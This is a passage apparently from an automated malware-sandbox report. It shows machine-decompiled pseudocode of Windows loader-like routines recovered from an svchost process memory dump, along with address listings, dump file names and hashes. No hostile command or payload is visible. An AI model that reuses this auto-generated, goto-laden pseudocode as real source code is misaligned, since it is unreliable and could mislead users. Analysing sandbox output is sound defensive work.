																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03038F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03063C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                        0x0303d5f2
                        0x0303d5f5
                        0x0303d5f5
                        0x0303d5fd
                        0x0303d600
                        0x0303d60a
                        0x0303d60d
                        0x0303d617
                        0x0303d61d
                        0x0303d627
                        0x0303d62e
                        0x0303d911
                        0x0303d913
                        0x00000000
                        0x0303d919
                        0x0303d919
                        0x0303d919
                        0x0303d634
                        0x0303d634
                        0x0303d634
                        0x0303d634
                        0x0303d640
                        0x0303d8bf
                        0x00000000
                        0x0303d646
                        0x0303d646
                        0x0303d64d
                        0x0303d652
                        0x0308b2fc
                        0x0308b2fc
                        0x0308b302
                        0x0308b33b
                        0x0308b341
                        0x00000000
                        0x0308b304
                        0x0308b304
                        0x0308b319
                        0x0308b31e
                        0x0308b324
                        0x0308b326
                        0x0308b332
                        0x0308b347
                        0x0308b34c
                        0x0308b351
                        0x0308b35a
                        0x00000000
                        0x0308b328
                        0x0308b328
                        0x00000000
                        0x0308b328
                        0x0308b326
                        0x0303d658
                        0x0303d658
                        0x0303d65b
                        0x0303d665
                        0x00000000
                        0x0303d66b
                        0x0303d66b
                        0x0303d66b
                        0x0303d66b
                        0x0303d66d
                        0x0303d672
                        0x0303d67a
                        0x00000000
                        0x00000000
                        0x0303d680
                        0x0303d686
                        0x0303d8ce
                        0x0303d8d4
                        0x0303d8dd
                        0x0303d8e0
                        0x0303d68c
                        0x0303d691
                        0x0303d69d
                        0x0303d6a2
                        0x0303d6a7
                        0x0303d6b0
                        0x0303d6b5
                        0x0303d6e0
                        0x0303d6b7
                        0x0303d6b7
                        0x0303d6b9
                        0x0303d6b9
                        0x0303d6bb
                        0x0303d6bd
                        0x0303d6ce
                        0x0303d6d0
                        0x0303d6d2
                        0x0308b363
                        0x0308b365
                        0x00000000
                        0x0308b36b
                        0x00000000
                        0x0308b36b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0303d6bf
                        0x0303d6bf
                        0x0303d6e5
                        0x0303d6e7
                        0x0303d6e9
                        0x0303d6ec
                        0x0303d6ec
                        0x0303d6ef
                        0x0303d6f5
                        0x0303d6f9
                        0x0303d6fb
                        0x0303d6fd
                        0x0303d701
                        0x0303d703
                        0x0303d70a
                        0x0303d70a
                        0x0303d701
                        0x0303d710
                        0x0303d710
                        0x0303d6c1
                        0x0303d6c1
                        0x0303d6c6
                        0x0308b36d
                        0x0308b36f
                        0x00000000
                        0x0308b375
                        0x0308b375
                        0x0308b375
                        0x00000000
                        0x0308b375
                        0x00000000
                        0x0303d6cc
                        0x0303d6d8
                        0x0303d6d8
                        0x0303d6d8
                        0x00000000
                        0x0303d6c6
                        0x0303d6bf
                        0x00000000
                        0x0303d6da
                        0x0303d6da
                        0x0303d716
                        0x0303d71b
                        0x0303d720
                        0x0303d726
                        0x0303d726
                        0x0303d72d
                        0x00000000
                        0x0303d733
                        0x0303d739
                        0x0303d742
                        0x0303d750
                        0x0303d758
                        0x0303d764
                        0x0303d776
                        0x0303d77a
                        0x0303d783
                        0x0303d928
                        0x0303d92c
                        0x0303d93d
                        0x0303d944
                        0x0303d94f
                        0x0303d954
                        0x0303d956
                        0x0303d95f
                        0x0303d961
                        0x0303d973
                        0x0303d973
                        0x0303d956
                        0x0303d944
                        0x0303d92c
                        0x0303d78b
                        0x0308b394
                        0x0303d791
                        0x0303d798
                        0x0308b3a3
                        0x0308b3bb
                        0x0308b3bb
                        0x0303d7a5
                        0x0303d866
                        0x0303d870
                        0x0303d884
                        0x0303d892
                        0x0303d898
                        0x0303d89e
                        0x0303d8a0
                        0x0303d8a6
                        0x0303d8ac
                        0x0303d8ae
                        0x0303d8b4
                        0x0303d8b4
                        0x0303d8ae
                        0x0303d7a5
                        0x0303d78b
                        0x0303d7b1
                        0x0308b3c5
                        0x0308b3c5
                        0x0303d7c3
                        0x0303d7ca
                        0x0303d7e5
                        0x0303d7eb
                        0x0303d8eb
                        0x0303d8ed
                        0x00000000
                        0x0303d8f3
                        0x0303d8f3
                        0x0303d8f3
                        0x00000000
                        0x0303d8ed
                        0x0303d7cc
                        0x0303d7cc
                        0x0303d7d2
                        0x00000000
                        0x0303d7d4
                        0x0303d7d4
                        0x0303d7d7
                        0x0303d7df
                        0x0308b3d4
                        0x0308b3d9
                        0x0308b3dc
                        0x0308b3dc
                        0x0308b3df
                        0x0308b3e2
                        0x0308b468
                        0x0308b46d
                        0x0308b46f
                        0x0308b46f
                        0x0308b475
                        0x0303d8f8
                        0x0303d8f9
                        0x0303d8fd
                        0x0308b3e8
                        0x0308b3e8
                        0x0308b3eb
                        0x0308b3ed
                        0x00000000
                        0x0308b3ef
                        0x0308b3ef
                        0x0308b3f1
                        0x0308b3f4
                        0x0308b3fe
                        0x0308b404
                        0x0308b409
                        0x0308b40e
                        0x0308b410
                        0x0308b410
                        0x0308b414
                        0x0308b414
                        0x0308b41b
                        0x0308b420
                        0x0308b423
                        0x0308b425
                        0x0308b427
                        0x0308b42a
                        0x0308b42d
                        0x0308b42d
                        0x0308b42a
                        0x0308b432
                        0x0308b436
                        0x0308b438
                        0x0308b43b
                        0x0308b43b
                        0x0308b449
                        0x0308b44e
                        0x0308b454
                        0x0308b458
                        0x0308b458
                        0x0308b45d
                        0x00000000
                        0x0308b45d
                        0x0308b3ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0303d7df
                        0x0303d7d2
                        0x0303d7ca
                        0x0308b37c
                        0x0308b37e
                        0x0308b385
                        0x0308b38a
                        0x00000000
                        0x0308b38a
                        0x0303d742
                        0x0303d7f1
                        0x0303d7f8
                        0x0308b49b
                        0x0308b49b
                        0x0303d800
                        0x0303d837
                        0x0303d843
                        0x0303d845
                        0x0303d847
                        0x0303d84a
                        0x0303d84b
                        0x0303d84e
                        0x0303d857
                        0x0303d802
                        0x0303d802
                        0x0303d80d
                        0x00000000
                        0x0303d818
                        0x0303d818
                        0x0303d824
                        0x0303d831
                        0x0308b4a5
                        0x0308b4ab
                        0x0308b4b3
                        0x0308b4b8
                        0x0308b4bb
                        0x00000000
                        0x0308b4c1
                        0x0308b4c1
                        0x0308b4c8
                        0x00000000
                        0x0308b4ce
                        0x0308b4d4
                        0x0308b4e1
                        0x0308b4e3
                        0x0308b4e5
                        0x00000000
                        0x0308b4eb
                        0x0308b4f0
                        0x0308b4f2
                        0x0303dac9
                        0x0303dacc
                        0x0303dacf
                        0x0303dad1
                        0x0303dd78
                        0x0303dd78
                        0x0303dcf2
                        0x00000000
                        0x0303dad7
                        0x0303dad9
                        0x0303dadb
                        0x00000000
                        0x00000000
                        0x0303dae1
                        0x0303dae1
                        0x0303dae4
                        0x0303dae6
                        0x0308b4f9
                        0x0308b4f9
                        0x0308b500
                        0x0303daec
                        0x0303daec
                        0x0303daf5
                        0x0303daf8
                        0x0303dafb
                        0x0303db03
                        0x0303db11
                        0x0303db16
                        0x0303db19
                        0x0303db1b
                        0x0308b52c
                        0x0308b531
                        0x0308b534
                        0x0303db21
                        0x0303db21
                        0x0303db24
                        0x0303dcd9
                        0x0303dce2
                        0x0303dce5
                        0x0303dd6a
                        0x0303dd6d
                        0x00000000
                        0x0303dd73
                        0x0308b51a
                        0x0308b51c
                        0x0308b51f
                        0x0308b524
                        0x00000000
                        0x0308b524
                        0x0303dce7
                        0x0303dce7
                        0x0303dce7
                        0x00000000
                        0x0303dce7
                        0x00000000
                        0x0303db2a
                        0x0303db2c
                        0x0303db31
                        0x0303db33
                        0x0303db36
                        0x0303db39
                        0x0303db3b
                        0x0303db66
                        0x0303db66
                        0x0303db3d
                        0x0303db3d
                        0x0303db3e
                        0x0303db46
                        0x0303db47
                        0x0303db49
                        0x0303db4c
                        0x0303db53
                        0x0303db55
                        0x0303db58
                        0x0303db5a
                        0x0308b50a
                        0x0308b50f
                        0x0308b512
                        0x0303db60
                        0x0303db60
                        0x0303db63
                        0x0303db63
                        0x00000000
                        0x0303db63
                        0x0303db5a
                        0x0303db3b
                        0x0303db24
                        0x0303db69
                        0x0303db69
                        0x0303db6c
                        0x0303db6f
                        0x0303db74
                        0x0308b557
                        0x0308b557
                        0x0308b55e
                        0x0303db7a
                        0x0303db7c
                        0x0303db7f
                        0x0303db82
                        0x0303db85
                        0x00000000
                        0x0303db8b
                        0x0303db8b
                        0x0303db8d
                        0x0303db9b
                        0x0303db9b
                        0x0303db9d
                        0x0303dba0
                        0x0303dba2
                        0x0303dba4
                        0x0303dba7
                        0x0303dba9
                        0x0303dbae
                        0x0303dbae
                        0x0303dbb1
                        0x0303dbb4
                        0x0303dbb4
                        0x0303dbb7
                        0x0303dbba
                        0x0303dcd2
                        0x0303dcd4
                        0x00000000
                        0x0303dbc0
                        0x0303dbc0
                        0x0303dbd2
                        0x0303dbd7
                        0x0303dbda
                        0x0303dbdd
                        0x0303dbdf
                        0x00000000
                        0x0303dbe5
                        0x0303dbe5
                        0x0303dbee
                        0x0303dbf1
                        0x0308b541
                        0x0308b544
                        0x00000000
                        0x0308b546
                        0x0308b546
                        0x00000000
                        0x0308b546
                        0x0303dbf7
                        0x0303dbf7
                        0x0303dbfd
                        0x0303dbfd
                        0x0303dbff
                        0x0303dc0b
                        0x0303dc15
                        0x0303dc1b
                        0x0303dc1d
                        0x0303dc21
                        0x0303dc21
                        0x0303dc23
                        0x0303dc23
                        0x0303dc26
                        0x0303dc29
                        0x0303dc2b
                        0x00000000
                        0x00000000
                        0x0303dc31
                        0x0303dc34
                        0x0303dc36
                        0x0303dcbf
                        0x0303dcbf
                        0x0303dcc2
                        0x00000000
                        0x0303dc3c
                        0x0303dc41
                        0x0303dc43
                        0x00000000
                        0x0303dc45
                        0x0303dc45
                        0x0303dc47
                        0x00000000
                        0x0303dc4d
                        0x0303dc4d
                        0x0303dc50
                        0x0303dc52
                        0x0303dc55
                        0x0303dcfa
                        0x0303dcfe
                        0x0303dd08
                        0x0303dd0a
                        0x0303dd0c
                        0x00000000
                        0x0303dd12
                        0x0303dd15
                        0x0303dd2d
                        0x0303dd2f
                        0x0303dd32
                        0x0303dd35
                        0x00000000
                        0x0303dd35
                        0x0303dc5b
                        0x0303dc5b
                        0x0303dc5e
                        0x0303dc61
                        0x0303dc64
                        0x0303dc67
                        0x0303dc67
                        0x0303dc6a
                        0x0303dc6c
                        0x0303dc8e
                        0x0303dc8e
                        0x0303dc91
                        0x0303dc93
                        0x0303dcce
                        0x0303dcce
                        0x0303dc95
                        0x0303dc9c
                        0x0303dc6e
                        0x0303dc72
                        0x0303dc75
                        0x0303dc77
                        0x0303dc79
                        0x0308b551
                        0x0308b551
                        0x00000000
                        0x0303dc7f
                        0x0303dc7f
                        0x0303dc81
                        0x00000000
                        0x0303dc83
                        0x0303dc86
                        0x0303dc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0303dc88
                        0x0303dc81
                        0x0303dc79
                        0x0303dc6c
                        0x0303dc55
                        0x0303dc47
                        0x0303dc43
                        0x00000000
                        0x0303dc36
                        0x0303dc23
                        0x00000000
                        0x0303dbff
                        0x0303dbf1
                        0x0303dbdf
                        0x0303db8f
                        0x0303db92
                        0x0303db95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0303db95
                        0x0303db8d
                        0x0303db85
                        0x0303db74
                        0x0303dc9f
                        0x0303dca2
                        0x0303dcb0
                        0x0303dcb0
                        0x0303dad1
                        0x0308b4e5
                        0x0308b4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0303d831
                        0x0303d80d
                        0x00000000
                        0x0303d800
                        0x0308b47f
                        0x0308b485
                        0x00000000
                        0x0308b485
                        0x0303d665
                        0x0303d652
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecb49a011ae0e82b8fd01c21b913d1ebc6055f0f38de5df544d3e9c23a137782
                        • Instruction ID: 1f5b712e74b88f176fbf44217c76b38a5dbbdda8c82593e4fc1df088f43f2e99
                        • Opcode Fuzzy Hash: ecb49a011ae0e82b8fd01c21b913d1ebc6055f0f38de5df544d3e9c23a137782
                        • Instruction Fuzzy Hash: 11E1C374A06319CFDB64EF14C984BAEB7FABF86304F0841E9D8499B290D770A985CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303849B Relevance: .3, Instructions: 290COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E0303849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x30ff9c0);
				E0307D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3117b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0303CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03042280( *[fs:0x30], 0x3118550);
						_t139 =  *0x3117b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0305F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0303FFB0(_t193, _t235, 0x3118550);
								L5:
								return E0307D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03021C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3117b9c; // 0x0
							_t235 = L03044620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3117b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0305A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0303FFB0(_t193, _t235, 0x3118550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L030477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L030477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3117b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3117b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E030637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3117b9c; // 0x0
									_t214 = L03044620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E030637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3117b10 =  *0x3117b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3117b04 =  *0x3117b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L030477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L030477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3117b08 =  *0x3117b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E030657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0306F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L030477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0305A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L030477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E030696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                        0x0303849b
                        0x0303849b
                        0x0303849b
                        0x0303849b
                        0x0303849d
                        0x030384a2
                        0x030384a7
                        0x030384b1
                        0x030384d8
                        0x00000000
                        0x030384b3
                        0x030384c4
                        0x030384c9
                        0x030384cd
                        0x030384cf
                        0x030384cf
                        0x030384d6
                        0x030384e6
                        0x030384e9
                        0x030384ec
                        0x030384ef
                        0x030384f2
                        0x030384f4
                        0x030384fc
                        0x03038501
                        0x03038506
                        0x03038509
                        0x030386e0
                        0x030386e5
                        0x030386e8
                        0x030386ed
                        0x030386f0
                        0x030386f2
                        0x03089afd
                        0x03089b02
                        0x030384da
                        0x030384df
                        0x030384df
                        0x030386fa
                        0x030386fd
                        0x030386fe
                        0x03038701
                        0x03038706
                        0x03038709
                        0x0303870b
                        0x00000000
                        0x00000000
                        0x03038711
                        0x03038725
                        0x03038727
                        0x0303872a
                        0x0303872c
                        0x03089af0
                        0x03089af5
                        0x03038732
                        0x03038732
                        0x03038732
                        0x03038735
                        0x03038737
                        0x03038515
                        0x03038515
                        0x03038518
                        0x0303851d
                        0x03038523
                        0x03038527
                        0x0303852b
                        0x03038537
                        0x03038539
                        0x0303853c
                        0x0303853e
                        0x0303868c
                        0x03038691
                        0x03038699
                        0x0303869b
                        0x03038744
                        0x03038748
                        0x030386a1
                        0x030386a1
                        0x030386a1
                        0x030386a4
                        0x030386a8
                        0x03089bdf
                        0x03089bdf
                        0x030386ae
                        0x030386b0
                        0x00000000
                        0x030386b6
                        0x00000000
                        0x03089be9
                        0x030386b0
                        0x03038544
                        0x0303854a
                        0x0303854d
                        0x03038551
                        0x0303876e
                        0x03038778
                        0x0303877b
                        0x03038780
                        0x03038557
                        0x03038557
                        0x0303855d
                        0x0303855d
                        0x0303856b
                        0x0303856e
                        0x03038570
                        0x03038573
                        0x03038576
                        0x03038576
                        0x03038579
                        0x0303857b
                        0x00000000
                        0x00000000
                        0x03038581
                        0x030385a0
                        0x030385a2
                        0x030385a5
                        0x030385a7
                        0x03089b1b
                        0x03089b1b
                        0x0303862e
                        0x0303862e
                        0x03038631
                        0x03038631
                        0x03038634
                        0x03038636
                        0x03038669
                        0x03038669
                        0x0303866b
                        0x03089bbf
                        0x03089bc4
                        0x03089bc8
                        0x03089bce
                        0x03089bce
                        0x03038671
                        0x03038671
                        0x03038674
                        0x03038676
                        0x03089bae
                        0x03089bae
                        0x03038676
                        0x0303867c
                        0x0303867e
                        0x03038688
                        0x03038688
                        0x00000000
                        0x0303867e
                        0x03038638
                        0x03038638
                        0x0303863b
                        0x0303863e
                        0x0303863f
                        0x03038642
                        0x03038645
                        0x03038648
                        0x0303864d
                        0x03089b69
                        0x03089b6e
                        0x03089b7b
                        0x03089b81
                        0x03089b85
                        0x03089b89
                        0x03089ba7
                        0x03089b8b
                        0x03089b91
                        0x03089b9a
                        0x03089b9f
                        0x03089b9f
                        0x03038788
                        0x0303878d
                        0x03038763
                        0x03038763
                        0x03038766
                        0x00000000
                        0x03038766
                        0x03089b70
                        0x00000000
                        0x03089b70
                        0x03038656
                        0x0303865a
                        0x0303865c
                        0x03038752
                        0x03038756
                        0x00000000
                        0x00000000
                        0x0303875e
                        0x00000000
                        0x0303875e
                        0x03038662
                        0x03038662
                        0x03038662
                        0x03038666
                        0x00000000
                        0x03038666
                        0x030385b7
                        0x030385b9
                        0x030385bc
                        0x030385bf
                        0x030385cc
                        0x030385d1
                        0x030385d4
                        0x030385db
                        0x030385de
                        0x030385e0
                        0x03089b5f
                        0x00000000
                        0x03089b5f
                        0x030385e6
                        0x030385ea
                        0x030386c3
                        0x030386c5
                        0x030386c8
                        0x030386ca
                        0x03089b16
                        0x00000000
                        0x03089b16
                        0x030386d6
                        0x030385f6
                        0x030385f6
                        0x030385f9
                        0x03038602
                        0x03038606
                        0x0303860a
                        0x0303860b
                        0x0303860e
                        0x03038611
                        0x00000000
                        0x03038611
                        0x030385f3
                        0x00000000
                        0x030385f3
                        0x03038619
                        0x0303861e
                        0x0303861e
                        0x03038621
                        0x03038622
                        0x03038623
                        0x03038625
                        0x0303862c
                        0x00000000
                        0x0303873d
                        0x00000000
                        0x0303873d
                        0x03038737
                        0x0303850f
                        0x03038512
                        0x00000000
                        0x03038512
                        0x00000000
                        0x030384d6

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ab0810536f6bb7ce3b2f406320c58aedddf4b9dc3dd0f1edb48906a7d447c4f
                        • Instruction ID: 52f5903925dcfcea968d2379ac282e38b2c2bab8bc9be31ea6453b04f4d498d5
                        • Opcode Fuzzy Hash: 2ab0810536f6bb7ce3b2f406320c58aedddf4b9dc3dd0f1edb48906a7d447c4f
